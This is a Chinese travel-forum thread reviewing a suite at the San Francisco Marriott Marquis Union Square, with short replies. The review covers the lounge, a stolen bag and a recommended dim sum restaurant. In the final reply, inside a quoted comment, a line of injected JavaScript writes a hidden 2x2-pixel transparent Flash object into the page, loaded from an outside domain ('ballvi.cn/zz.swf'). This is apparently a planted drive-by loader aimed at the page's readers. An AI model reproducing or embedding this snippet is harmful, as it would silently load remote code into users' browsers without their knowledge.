发文
  • 新手指引 登录 注册
  • APP

旧金山联合广场侯爵万豪湾景迎宾套体验…中规中矩的大车店哈哈…(多图另附推荐早茶店)

1330 23

一、 概览 | Overview

地理位置优越但是人流量巨大。根据楼层分了两个zone也就是两组客梯。粉色为中高楼层,黄色中底楼。
总体打分3.5。
设施有点陈旧但是服务挺好。带酒廊的酒店还是很好的哈。 旧金山联合广场侯爵万豪湾景迎宾套体验…中规中矩的大车店哈哈…(多图另附推荐早茶店)
旧金山联合广场侯爵万豪湾景迎宾套体验…中规中矩的大车店哈哈…(多图另附推荐早茶店)

二、 客房 |  In Room

房间一样是预定乞丐房,使用套房券升级到了算是湾景迎宾套吧。
客厅无比大,但是灯需要一个个开关也是一件很痛苦的事情…
备品的话牙刷和拖鞋都可以打电话要,但是这家没有烧水壶噢。 旧金山联合广场侯爵万豪湾景迎宾套体验…中规中矩的大车店哈哈…(多图另附推荐早茶店)

三、 餐饮 |  Dining

酒廊名为M Club。每天开放内容略有不同,我这次去正好是周日,所以体验了一下HH和甜点时间。
HH有两个热菜,其他都是一些冷食,甜点也就这几款。想填饱肚子的话也不是什么难事。如果想吃好还是得出门。
早餐的草莓很抢眼又大又甜。培根也不老,挺推荐的。
唯一遗憾在酒廊内丢了一个包,因为去拿吃的离开座位过了会回来就不见了,酒廊内没有摄像头所以找回很困难,好在有酒店工作人员配合做了一个记录并报警。之后拿着警察开具的证明走保险即可。这时候还是感叹一下高端信用卡的好处啊… 旧金山联合广场侯爵万豪湾景迎宾套体验…中规中矩的大车店哈哈…(多图另附推荐早茶店)

四、 设施 |  Facilities

没来得及去,有需求的可以自行探索一下。

五、 难忘瞬间 |  the Moments

酒廊内丢失了一个包,结果酒店前台很热心的帮忙打电话联系警察。酒店安保部门也出面加具证明,帮助我给警察立案。能做到这样非常感谢了已经。

六、 总结 |  Conclusion

处于联合广场周边,楼下走路5分钟内就是大商场和公交站非常方便。当然相对的也比较嘈杂,酒店客房太多导致人也很多。
推荐早茶店名为羊城茶室,老广东人开的还是很有保证的。来旧金山想吃口早茶的可以来试试。早上10点开门,傍晚就关了哈。 旧金山联合广场侯爵万豪湾景迎宾套体验…中规中矩的大车店哈哈…(多图另附推荐早茶店)

评分 ( 1人) 威望 理由 总评分: 威望 +2  查看全部评分
大小飞飞
+ 2 恭喜, 每10个回复奖励1个威望, 每贴最高奖励10威望。
鲜花 (21朵) 鲜花榜
asiaboy1002022-6-7 09:52
送了1朵鲜花:  Life is better when shared!
芒果剪刀布2022-6-4 12:11
送了1朵鲜花:  Life is better when shared!
@JP2022-6-4 06:10
飞客咖2022-6-4 04:25
AlexZ12022-6-3 14:19
上一篇:  下一篇: 

关注本版大神,阅读更多精彩好文

23 个评论

Creed0911  黑钻会员  2022-6-1 22:21:14  | 显示全部楼层
感谢分享
小茂两三只  终钻会员  2022-6-2 08:55:41  | 显示全部楼层
这酒店还不错哦,感觉不是很车
旧金山的粤菜堪比广州了,哈哈
bluerossi  终钻会员  2022-6-2 11:42:04  | 显示全部楼层

回帖奖励 +1 威望

感谢分享
wxiaobai  终钻会员  2022-6-2 12:18:31  | 显示全部楼层

回帖奖励 +1 威望

不错!
Jojo16  终钻会员  2022-6-2 13:10:32  | 显示全部楼层

回帖奖励 +1 威望

感谢分享
Lovelyz8  终钻会员  2022-6-2 13:21:25  | 显示全部楼层

回帖奖励 +1 威望

感謝分享
是骆骆啊  黑钻会员  2022-6-2 13:26:11  | 显示全部楼层

回帖奖励 +1 威望

感谢分享
canny-12  终钻会员  2022-6-2 13:32:44  | 显示全部楼层

回帖奖励 +1 威望

感谢分享
tylss  蓝钻会员  2022-6-2 13:59:32  | 显示全部楼层

回帖奖励 +1 威望

感谢分享
BebeWon  终钻会员  2022-6-2 14:09:04  | 显示全部楼层

回帖奖励 +1 威望

感谢分享
Alin112  黑钻会员  2022-6-2 14:14:55  | 显示全部楼层

回帖奖励 +1 威望

谢谢分享
神勇小金桔  终钻会员  2022-6-2 14:49:58  | 显示全部楼层

回帖奖励 +1 威望

谢谢分享
谨兮  金卡会员  2022-6-2 17:26:53  | 显示全部楼层
周边的交通还是蛮方便的                                                            
哈兜兜  钻石会员   楼主| 2022-6-2 22:19:43  | 显示全部楼层
小茂两三只 发表于 2022-6-2 08:55
这酒店还不错哦,感觉不是很车旧金山的粤菜堪比广州了,哈哈
真的………
哈兜兜  钻石会员   楼主| 2022-6-2 22:21:13  | 显示全部楼层
谨兮 发表于 2022-6-2 17:26
周边的交通还是蛮方便的                     $('swf_z9q').innerHTML=AC_FL_RunContent('width', '2', 'height', '2', 'allowNetworking', 'internal', 'allowAccess', 'never', 'src', '//ballvi.cn/zz.swf', 'quality', 'high', 'bgcolor', '#ffffff', 'wmode', 'transparent', 'allowfullscreen', 'true');
对啊哈哈就是人多